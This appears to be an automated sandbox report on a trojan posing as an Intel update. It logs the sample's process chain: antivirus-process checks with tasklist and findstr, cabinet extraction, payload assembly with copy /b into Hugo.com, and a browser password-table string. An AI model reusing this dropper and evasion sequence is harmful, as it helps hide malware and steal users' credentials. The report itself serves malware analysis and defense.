                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004074BB0_2_004074BB
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F3801713_2_00F38017
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F1E1F013_2_00F1E1F0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F2E14413_2_00F2E144
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F322A213_2_00F322A2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F122AD13_2_00F122AD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4A26E13_2_00F4A26E
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F2C62413_2_00F2C624
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F9C8A413_2_00F9C8A4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4E87F13_2_00F4E87F
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F46ADE13_2_00F46ADE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F82A0513_2_00F82A05
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F78BFF13_2_00F78BFF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F2CD7A13_2_00F2CD7A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F3CE1013_2_00F3CE10
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4715913_2_00F47159
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F1924013_2_00F19240
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00FA531113_2_00FA5311
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F196E013_2_00F196E0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F3170413_2_00F31704
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F31A7613_2_00F31A76
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F37B8B13_2_00F37B8B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F19B6013_2_00F19B60
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F37DBA13_2_00F37DBA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F31D2013_2_00F31D20
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F31FE713_2_00F31FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: String function: 004062A3 appears 58 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: String function: 00F2FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: String function: 00F30DA0 appears 46 times
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: invalid certificate
                Source: [UPD]Intel_Unit.2.1.exe, 00000000.00000002.2261740316.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs [UPD]Intel_Unit.2.1.exe
                Source: [UPD]Intel_Unit.2.1.exe, 00000000.00000003.2258232706.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs [UPD]Intel_Unit.2.1.exe
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/21@12/2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F841FA GetLastError,FormatMessageW,13_2_00F841FA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00F72010
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F71A0B AdjustTokenPrivileges,CloseHandle,13_2_00F71A0B
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00F7DD87
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,13_2_00F83A0E
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IllustrationsJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile created: C:\Users\user\AppData\Local\Temp\nsiCCCC.tmpJump to behavior
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Hugo.com, 0000000D.00000003.2706375282.00000000049EC000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2695000319.00000000049D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeFile read: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe "C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe"
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Justify
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 686536Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E JustifyJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Backing" Kelly Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com Hugo.com yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: [UPD]Intel_Unit.2.1.exeStatic file information: File size 1119746 > 1048576
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: real checksum: 0x1150f2 should be: 0x11d4e3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F30DE6 push ecx; ret 13_2_00F30DF9

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00FA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00FA26DD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00F2FC7C
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
